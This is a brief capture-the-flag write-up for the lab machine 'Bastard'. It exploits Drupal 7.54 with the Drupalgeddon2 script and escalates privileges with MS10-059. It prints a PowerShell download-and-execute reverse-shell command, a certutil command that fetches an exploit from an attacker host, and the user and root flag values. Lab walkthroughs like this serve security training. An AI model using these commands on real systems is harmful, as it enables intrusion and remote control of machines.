# Bastard

# Recon

Starting with recon:

sudo autorecon 10.10.10.9

# Enumeration

  • Drupal 7.54 on port 80

# Exploit

Drupalgeddon2 the ruby script works from searchsploit

searchsploit -m 44449.rb

and when running this, we get a warning about a shebang error, so we use dos2unix to fix this.

dos2unix 44449.rb

and finally fire off the exploit:

ruby 44449.rb

now running this with reverse shell on 443:

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.27/powercat.ps1');powercat -c 10.10.14.27 -p 443 -e cmd"

gives us a low priv reverse shell.

User.txt: ba22fde1932d06eb76a163d312f921a2

# Privilege escalation

Get systeminfo and use windows-exploit-suggester

certutil.exe -urlcache -split -f "http://10.10.14.27/MS10-059.exe" C:\inetpub\drupal-7.54\MS10-059.exe

MS10-059.exe 10.10.14.27 5555

root.txt: 4bf12b963da1b30cc93496f617f7ba7c